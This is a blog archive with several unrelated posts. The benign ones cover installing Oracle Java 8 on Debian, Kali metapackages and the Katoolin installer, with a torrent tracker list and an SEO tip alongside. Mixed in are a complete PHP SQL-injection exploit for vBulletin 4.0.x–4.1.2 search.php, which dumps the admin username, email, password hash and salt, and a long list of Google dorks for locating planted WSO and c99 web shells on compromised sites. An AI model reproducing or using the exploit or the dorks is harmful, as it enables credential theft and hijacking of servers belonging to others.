29 Ekim 2017 Pazar

How To Install Oracle Java 8 In Debian Via Repository [JDK8]

Oracle Java 8 was released yesterday and it can be installed in Debian by using the WebUpd8 Java PPA repository.

Usually, the packages available in Launchpad PPAs don't support Debian because they are built against specific Ubuntu libraries, but since the WebUpd8 Oracle Java PPA contains just an installer, it works on Debian too.

Using this PPA repository, you'll be able to install Oracle Java 8 (which includes both JRE8 and JDK8) in Debian for both 32bit and 64bit as well as ARM (ARM v6/v7 Hard Float ABI - there's no JDK 8 ARM Soft Float ABI archive available for download on Oracle's website).

The installer automatically downloads and installs Oracle JDK8, but no actual Java files are available in our repository (that's not allowed by the Oracle Java license).

For Ubuntu / Linux Mint installation instructions, see: Install Oracle Java 8 In Ubuntu Via PPA Repository [JDK8]


Install Oracle Java 8 (both JDK8 and JRE8) in Debian


Oracle Java 8 installed Debian
Tested on Debian Wheezy but it should work with any Debian version

To add the WebUpd8 Oracle Java PPA repository and install Oracle Java 8 in Debian, use the following commands:
su -
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys EEA14886
apt-get update
apt-get install oracle-java8-installer
exit

And that's it, Oracle Java 8 should now be installed and you should get automatic updates for future Oracle Java 8 versions, under Debian.

-----------------------------------------------------------
Update October 20, 2016:

Previously, this package would increment the Java priority to make it default. The oracle-java8-installer package now sets the Java priority to 1081, and that may or may not set it as default, depending on other Java packages you may have installed (for instance, if Java 7 is also installed, Java 8 becomes default, but if Java 9 is installed, Java 8 doesn't become default).

To make Java 8 default, you must install the "oracle-java8-set-default" package (which configures the Java environment variables and sets it as default), which I added as a "Recommended" package to "oracle-java8-installer".

For instance, in Ubuntu, recommended packages are automatically installed, so "oracle-java8-set-default" should be installed when installing "oracle-java8-installer". In Linux Mint on the other hand, recommended packages are not installed by default, so you must install this package manually if you want to set Oracle Java 8 as default.

So, if you want to set Oracle Java 8 as default, no matter what other Java versions are installed, make sure that you install the oracle-java8-set-default package (which, again, should be automatically installed with the main Oracle Java Installer package in Ubuntu, but not in Linux Mint):
sudo apt-get install oracle-java8-set-default

If you don't want to make Oracle Java 8 default (it might still be set as default, depending on what other Java versions you may have installed), install the oracle-java8-installer with "--no-install-recommends":
sudo apt-get install --no-install-recommends oracle-java8-installer

Note: removing the oracle-java8-set-default package does not undo all the changes (I have yet to find a way to do this properly). If you don't want to set it as default, remove both oracle-java8-installer and oracle-java8-set-default packages, and then install oracle-java8-installer with "--no-install-recommends" (like mentioned above).
-----------------------------------------------------------

Tip: if you're behind a firewall / router that blocks some of the redirects required to download the Oracle Java archive, you can download the JDK tar.gz archive manually and place it under /var/cache/oracle-jdk8-installer - then, installing the "oracle-java8-installer" package will use the local archive instead of trying it to download it itself.

After installing Oracle Java and the "oracle-java8-set-default" package, you can check out the Java version on your system by using these commands:
java -version
This should display something like this:
java version "1.8.0_111"
Java(TM) SE Runtime Environment (build 1.8.0_111-b14)
Java HotSpot(TM) 64-Bit Server VM (build 25.111-b14, mixed mode)
Or:
javac -version
Which should display something like this:
javac 1.8.0_111

For how to install Oracle Java 7 in Debian, see THIS article.

For Oracle Java 9, see THIS article.


How to accept the Oracle JDK8 license automatically


The Oracle Java 8 installer requires you to accept the Oracle license before the installation begins. If for some reason you want to accept the license automatically, you can use the following command:
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections

Update: if the command above doesn't work, use the following (thanks to Adam!):
echo oracle-java8-installer shared/accepted-oracle-licence-v1-1 boolean true | sudo /usr/bin/debconf-set-selections

Install packages you want in kali linux light

Install packages you want in kali linux light
If you have downloaded Kali Linux 32 bit mini, Kali Linux 64 bit mini, Kali Linux 32 bit Light, Kali Linux 64 bit Light, then you might find that some tools are missing and only some basic tools are available such as nmap, Aircrack-ng.

Kali Linux provide multiple metapackages that would allow us to easily install subsets of tools based on our particular needs. After installation of kali linux mini or light version here is what you want to do first. Below is the way to install the package you want.

1. Make sure you have correct repo. for more info go to http://docs.kali.org/general-use/kali-linux-sources-list-repositories

a. Always take a backup
 # mv /etc/apt/sources.list /etc/apt/sources.list_BAK

b. Create a repo source file
# vi /etc/apt/sources.list

c. Paste following 
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

# sudo apt-get update

d. search available metapackages 
# apt-cache search kali-linux



you can play around with apt-cache
# apt-cache -h
# apt-cache showpkg kali-linux  

e. If you want kali-linux-web package then install with below command
# apt-get install kali-linux-web

Find out list of tools inside each packages: http://tools.kali.org/kali-metapackages

What if you just want a tool. For example, if there is no arpspoof by default and 
you want to install it

# apt-cache search arpspoof



# apt-get install dsniff

There you go :)

How to Auto Install All Kali Linux Tools Using “Katoolin” on Debian/Ubuntu

Katoolin is a script that helps to install Kali Linux tools on your Linux distribution of choice. For those of us who like to use penetration testing tools provided by Kali Linux development team can effectively do that on their preferred Linux distribution by using Katoolin.
Katoolin - Install Kali Linux Tools
Katoolin – Install Kali Linux Tools
In this tutorial we are going to look at steps to install Katoolin on Debian based derivatives.

Major Features of Katoolin

  1. Adding Kali Linux repositories.
  2. Removing Kali Linux repositories.
  3. Installing Kali Linux tools.

Requirements

Requirements for installing and using Katoolin.
  1. An operating system for this case we are using Ubuntu 14.04 64-bit.
  2. Python 2.7

Installing Katoolin

To install Katoolin run the following commands.
# apt-get install git
# git clone https://github.com/LionSec/katoolin.git  && cp katoolin/katoolin.py /usr/bin/katoolin
Sample Output
cp katoolin/katoolin.py /usr/bin/katoolin
Cloning into 'katoolin'...
remote: Counting objects: 52, done.
remote: Total 52 (delta 0), reused 0 (delta 0), pack-reused 52
Unpacking objects: 100% (52/52), done.
Checking connectivity... done.
Then make /usr/bin/katoolin executable by running the command below.
# chmod +x  /usr/bin/katoolin
Now you can run Katoolin as follows.
# katoolin
The output below shows the interface of Katoolin when you run the command.
Sample Output
 $$\   $$\             $$\                         $$\ $$\           
$$ | $$  |            $$ |                        $$ |\__|          
$$ |$$  /  $$$$$$\  $$$$$$\    $$$$$$\   $$$$$$\  $$ |$$\ $$$$$$$\  
$$$$$  /   \____$$\ \_$$  _|  $$  __$$\ $$  __$$\ $$ |$$ |$$  __$$\ 
$$  $$<    $$$$$$$ |  Kali linux tools installer |$$ |$$ |$$ |  $$ |
$$ |\$$\  $$  __$$ |  $$ |$$\ $$ |  $$ |$$ |  $$ |$$ |$$ |$$ |  $$ |
$$ | \$$\ \$$$$$$$ |  \$$$$  |\$$$$$$  |\$$$$$$  |$$ |$$ |$$ |  $$ |
\__|  \__| \_______|   \____/  \______/  \______/ \__|\__|\__|  \__| V1.0 
+ -- -- +=[ Author: LionSec | Homepage: www.lionsec.net
+ -- -- +=[ 330 Tools 
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
As you can see it provides a menu from which you can make selections of what you want to do.
Incase the above way of installation fails, you also can try the following steps.
Go to https://github.com/LionSec/katoolin.git page download the zip file and extract it.
# wget https://github.com/LionSec/katoolin/archive/master.zip
# unzip master.zip
After extracting, you should be able to find katoolin.py script. Run katoolin.py command, you will be able to view the output similar to above.
# cd katoolin-master/
# chmod 755 katoolin.py
#  ./katoolin.py 

How do I use Katoolin?

To add Kali Linux repositories and update repositories, select option 1 from the Menu.
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1
Sample Output
Executing: gpg --ignore-time-conflict --no-options --no-default-keyring --homedir /tmp/tmp.DC9QzwECdM --no-auto-check-trustdb --trust-model always --keyring /etc/apt/trusted.gpg --primary-keyring /etc/apt/trusted.gpg --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
gpg: requesting key 7D8D0BF6 from hkp server pgp.mit.edu
gpg: key 7D8D0BF6: public key "Kali Linux Repository <devel@kali.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
Then you can select option 2 from the interface above to update the repositories. From the output below, I have only captured a portion where Kali Linux repositories are being updated so that one can install Kali Linux tools in Ubuntu.
What do you want to do ?> 2
Ign http://in.archive.ubuntu.com vivid InRelease                                                                                            
Ign http://security.ubuntu.com vivid-security InRelease                                                                                                               
Ign http://in.archive.ubuntu.com vivid-updates InRelease                                                                                                               
Get:1 http://security.ubuntu.com vivid-security Release.gpg [933B]                                                                                                    
Ign http://in.archive.ubuntu.com vivid-backports InRelease                                                                                                                      
Get:2 http://repo.kali.org kali-bleeding-edge InRelease [11.9 kB]                                                                              
Get:3 http://security.ubuntu.com vivid-security Release [63.5 kB]                                                            
Hit http://in.archive.ubuntu.com vivid Release.gpg                                                                              
Get:4 http://repo.kali.org kali-bleeding-edge/main amd64 Packages [8,164 B]                                                
Get:5 http://in.archive.ubuntu.com vivid-updates Release.gpg [933 B]                                                                
Get:6 http://repo.kali.org kali-bleeding-edge/main i386 Packages [8,162 B]                                               
Hit http://in.archive.ubuntu.com vivid-backports Release.gpg    
...  
If you want to delete the Kali Linux repositories you added, then select option 3.
What do you want to do ?> 3
All kali linux repositories have been deleted !
As part of its operation, the Apt package uses a /etc/apt/sources.list that lists the ‘sources‘ from which you can obtain and install other packages.
To view contents of /etc/apt/sources.list file, select of 4.
What do you want to do ?> 4
#deb cdrom:[Ubuntu 15.04 _Vivid Vervet_ - Release amd64 (20150422)]/ vivid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
...
To go back you can simply type back and press [Enter] key.
What do you want to do ?> back
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 
To go back to the main menu, simply type gohome and press [Enter] key.
kat > gohome
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
There are different categories of Kali Linux tools you can install on your Ubuntu using Katoolin.
To view the available categories, select option 2 from the main menu.
kat > 2
**************************** All Categories *****************************
1) Information Gathering   8) Exploitation Tools
2) Vulnerability Analysis   9) Forensics Tools
3) Wireless Attacks    10) Stress Testing
4) Web Applications    11) Password Attacks
5) Sniffing & Spoofing    12) Reverse Engineering
6) Maintaining Access    13) Hardware Hacking
7) Reporting Tools     14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
You can select a category of choice or install all available Kali Linux tools by selecting option (0) and press [Enter] to install.
You can also install a ClassicMenu indicator using Katoolin.
    1. ClassicMenu Indicator is a application indicator for the top panel of Ubuntu’s Unity desktop environment.
    2. ClassicMenu Indicator provides a simple way for you to get a classic GNOME-style application menu for those who prefer this over the default Unity dash menu.
For more information, please visit : http://www.florian-diesch.de/software/classicmenu-indicator/
To install classicmenu indicator, press y and press [Enter].
kat > back
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
ClassicMenu Indicator is a notification area applet (application indicator) for the top panel of Ubuntu's Unity desktop environment.
It provides a simple way to get a classic GNOME-style application menu for those who prefer this over the Unity dash menu.
Like the classic GNOME menu, it includes Wine games and applications if you have those installed.
For more information , please visit : http://www.florian-diesch.de/software/classicmenu-indicator/
Do you want to install classicmenu indicator ? [y/n]> y
This PPA contains the most recent alpha/beta releases for
 * Arronax http://www.florian-diesch.de/software/arronax/
 * ClassicMenu Indicator http://www.florian-diesch.de/software/classicmenu-indicator/
* Privacy Indicator http://www.florian-diesch.de/software/indicator-privacy/
 * RunLens http://www.florian-diesch.de/software/runlens/
 * Unsettings http://www.florian-diesch.de/software/unsettings/
 * UUdeLens http://www.florian-diesch.de/software/uudelens
More info: https://launchpad.net/~diesch/+archive/ubuntu/testing
Press [ENTER] to continue or ctrl-c to cancel adding it
gpg: keyring `/tmp/tmpaqk6fphl/secring.gpg' created
gpg: keyring `/tmp/tmpaqk6fphl/pubring.gpg' created
...
You can also install Kali menu in Ubuntu by select option 4 and press y and then press [Enter].
To quit Katoolin, simply press Control+C.
kat > ^CShutdown requested...Goodbye...

11 Eylül 2017 Pazartesi

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

                      888               888    888              
                      888               888    888              
                      888               888    888              
 .d8888b .d88b.   .d88888  .d88b.   .d88888    88888b.  888  888
d88P"   d88""88b d88" 888 d8P  Y8b d88" 888    888 "88b 888  888
888     888  888 888  888 88888888 888  888    888  888 888  888
Y88b.   Y88..88P Y88b 888 Y8b.     Y88b 888    888 d88P Y88b 888
 "Y8888P "Y88P"   "Y88888  "Y8888   "Y88888    88888P"   "Y88888
                                                             888
                                                        Y8b d88P
                                                         "Y88P"

8888888b.         d8888 888888b.    .d8888b.   .d88888b.  888     888 888b    888
888   Y88b       d88888 888  "88b  d88P  Y88b d88P" "Y88b 888     888 8888b   888
888    888      d88P888 888  .88P       .d88P 888     888 888     888 88888b  888
888   d88P     d88P 888 8888888K.      8888"  888     888 888     888 888Y88b 888
8888888P"     d88P  888 888  "Y88b      "Y8b. 888     888 888     888 888 Y88b888
888 T88b     d88P   888 888    888 888    888 888     888 888     888 888  Y88888
888  T88b   d8888888888 888   d88P Y88b  d88P Y88b. .d88P Y88b. .d88P 888   Y8888
888   T88b d88P     888 8888888P"   "Y8888P"   "Y88888P"   "Y88888P"  888    Y888


mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>

<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text'  size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>

<?
 if($_POST['form_action'] == 1 )
 {
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];

$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
       $md5Pass = md5($pass);
       $data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";

       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   // curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
 
 
 
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');


       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);



$url2= trim(myf($store,"Location:","Content-Length:"));

       $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL,$url2);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
   curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");

//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)

{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>

8 Ağustos 2017 Salı

torrent-tracker listesi



--------------------------------------------------------------------------------
ZAMUNDA TRACKERLAR
--------------------------------------------------------------------------------
http://tracker.zamunda.net/announce.php?passkey=81bdcd71a27ca6235be02a628dd99306

http://tracker.zamunda.net/announce.php?passkey=51ce611a8fc91a9d414a243917d0a7f7

--------------------------------------------------------------------------------
DİGER TRACKERLAR
--------------------------------------------------------------------------------

udp://open.demonii.com:1337/announce

udp://tracker.istole.it:80/announce

udp://tracker.openbittorrent.com:80/announce

udp://tracker.publicbt.com:80/announce

http://thetorrents.net:2710/announce

http://121.14.98.151:9090/announce

http://94.228.192.98/announce

http://announce.opensharing.org:2710/announce

http://announce.torrentsmd.com:6969/announce

http://announce.torrentsmd.com:8080/announce

http://beta.mytracker.me:6969/announce

http://bigfoot1942.sektori.org:6969/announce

http://bigtorrent.org:2710/announce

http://bittorrenttracker.novicorp.com/announce.php

http://bt.careland.com.cn:6969/announce

http://bt.poletracker.org:2710/announce

http://exodus.desync.com/announce

http://exodus.desync.com:6969/announce

udp://tracker.ccc.de:80/announce

http://fr33dom.h33t.com:3310/announce

http://fr33domtracker.h33t.com:3310/announce

http://i.bandito.org/announce

http://ipv4.tracker.harry.lu/announce

http://torrent.youceff.com:6969/announce

http://tracker.novalayer.org:6969/announce

http://tracker.publichash.org:6969/announce

http://tracker.torrentbay.to:6969/announce

http://tracker.torrentparty.com:2202/announce

http://tracker.yify-torrents.com:80/announce

http://webtorrents.com:2710/announce

http://www.h33t.com:3310/announce

udp://10.rarbg.me:80/announce

udp://11.rarbg.me:80/announce

udp://12.rarbg.me:80/announce

udp://9.rarbg.com:2710/announce

udp://bt.rghost.net:80/announce

udp://fr33domtracker.h33t.com:3310/announce

udp://ipv4.tracker.harry.lu:80/announce

udp://t1.pow7.com:80/announce

udp://tpb.tracker.prq.to:80/announce

udp://tracker.beeimg.com:6969/announce

udp://tracker.coppersurfer.tk:6969/announce

udp://tracker.ilibr.org:80/announce

udp://tracker.jamendo.com:80/announce

udp://tracker.prq.to:80/announce

udp://tv.tracker.prq.to:80/announce


11 Mayıs 2017 Perşembe

Debian sunucu güvenliğini


site indexleme

1. Create a link on that page is indexing search engines to the direction of our new website. We emulate the profile (for example: “www.friendster.com / okam” is a good example to link to the blog or our website. Because this page usually has terindeks search engine. The higher the position of the pages in search engines (PageRank) means the more quickly we terindeks new webiste. 
You can contact your friend is terindeks the blog search engines to install a link to you.
* If the profile / emulate in your blog / Multiply terindeks already, you can install a link in your profile is.
* Every fill your blog. Google Analytic is a plug-in idea will always monitor your activities.
2. Submit manually through the following URL (FREE):
* Google: http://www.google.com/addurl.html
* Yahoo: http://search.yahoo.com/info/submit.html
* AltaVista: http://www.altavista.com/addurl/
* DMOZ / ODP: http://www.dmoz.org/add.html
* Alexa: http://www.alexa.com/support/get_archive.html
* MSN: http://search.msn.com/docs/submit.aspx
3. Submit the URL pay:
* Lycos: http://home.lycos.com/addasite.html
4. Before downloading you submit the URL of your website, make sure that:
* Website or blog so you have (not under construction).
* There are no dead links in your website.
* Website or made to your search engine friendly.
After you submit your URL, wait with patience. If the website you will be lucky terindeks in less than 24 hours, if not prosper you must wait 3 months, possibly even your application is not accepted Search Engine. You can re-submit if within 3 months of your website not appear in search engines.
What should be done during the wait? Building the link. Can be suddenly your website because nongol not submit manually, but because of a link from another website.
Congratulations to try.

Shell Arama Kodları

intitle:webr00t cgi shell
“inurl:.root”.”webr00t cgi shell”
“intitle:Index of */sym”.”inurl:/sym”
“5.2.17 Safe mode:”
“5.2.11 Safe mode:”
“5.2.12 Safe mode:”
“Sifre=webr00t”
“5.2.11 Safe mode:”
“5.2.10 Safe mode:”
“5.2.1 Safe mode:”
intxt:”webadmin.php”
inurl:webadmin.php”
intitle: Linux * 2.6.18-348.1.1.el5PAE
intitle: – WSO 2.3
intitle: – WSO 2.4
intitle: – WSO 2.5
intitle: – WSO 2.5.1
5.2.16 Safe mode: OFF [ phpinfo ] Datetime:
2009 i686 Server IP:
2010 i686 Server IP:
2011 i686 Server IP:
2012 i686 Server IP:
2013 i686 Server IP:
“Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc, locate”
“Downloaders: wget, lynx, links, curl, lwp-mirror”
“Type Host Login Password Database”
“Execution PHP-code”
“reverse (login -> nigol)”.”/etc/passwd”
” Bind port to /bin/sh [perl]“
“drwxr-xr-x [ home ]“
inurl:wso2.php
inurl:wso2.4.php
inurl:wso2.5.php
inurl:wso2.5.1.php
“Filesystem Size Used Avail Use% Mounted on”
“# Do not remove the following line, or various programs”
inurl:wso.php uid=0(root)
“posix_getpwuid (“Read” /etc/passwd)”
“captain crunch security team” inurl:wso
download wso2.php
download wso2.5.1.php
inurl:sym.php
allinurl: wsotest.php
inurl:wso.php
“-:[ User & Domains & Symlink ]:-“
allinurl: wso.php
inurl:”/wso.php”
allinurl: wso2.5.php
inurl:wso.php
inurl:”sym.php” Symlink Sa 3.0
inurl:wso.php uid=0(root)
“Symlink Sa 3.0″
intitle:Symlink Sa 3.0
inurl:”/wso.php”
inurl:wso.php
inurl:wso2.php
inurl:wso2.5.php
inurl:wso2.5.1.php
wso shell v.1.0 (roots)
inurl:wso.php
allintitle: “[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
inurl:”[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
intxt:[ Bypass Read ] [ Mass Joomla ] [ Mass WordPress ] [ Mass vBulletin ] [ Help ]
intitle:B-F Config_cPanel
intitle:Blind SQL Injection
intitle:Bypass Disable function
intitle:Carbylamine PHP Encoder
intitle:Change Joomla Index
intitle:Change WP Index
intitle:Converter Havij To Pro
intitle:Cpanel Brute Forcer 2012
intitle:Cpanel Brute Forcer 2011
intitle:Cpanel Brute Forcer 2013
intitle:Cpanel Webmail Brute Forcer
intitle:Face Book Brute Forcer
intitle:zip Filez Server ScaNNer v1.0
“Saudi Sh3ll v1.0″
inurl:wso.php#
Allinurl:wso2.5.1.php#
Allinurl:wso2.5.php#
Allinurl:wso2.4.php#
intitle:wsec_wp GUI v1.0
intitle:Symlink Sa v3.0
intitle:Symlink Sa v2.0
intitle:Symlink Sa v1.0
intitle:king B_F v1.0 Brute Forcer script
intitle:r00t4Lif t00lkit v0.2
allinurl: “wso.php”
intitle:symlink_Sa 2.0
inurl:.php?sws=sec
inurl:.php?sws=sym
inurl:.php?sws=file
inurl:.php?act=selfremove
inurl:.php?act=sql
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.txt
inurl:c99.php uid=0(root)
root c99.php
“Captain Crunch Security Team” inurl:c99
download c99.php
inurl:c99.php
allinurl: c99.php
allinurl: c99.txt
inurl:”/c99.php”
inurl:”c99.php” c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
inurl:”/c99.php”
c99 shell v.1.0 (roots)
allintitle: “c99shell”
inurl:”c99.php
allinurl: “c99.php”
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: “c99.php”
inurl:”c99.php”
inurl:”c99.php”
inurl:”c99.php” c99shell
inurl:”c99.php”
inurl:”/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:”c99.php”
inurl:”c99.php”
allinurl:c99.php?
“inurl:c99..php”
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
“c99.php” filetypehp
allinurl:c99.php
inurl:c99shell.php
allinurl:.c99.php
“inurl:c99.php”
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.txt
inurl:c99shell.txt
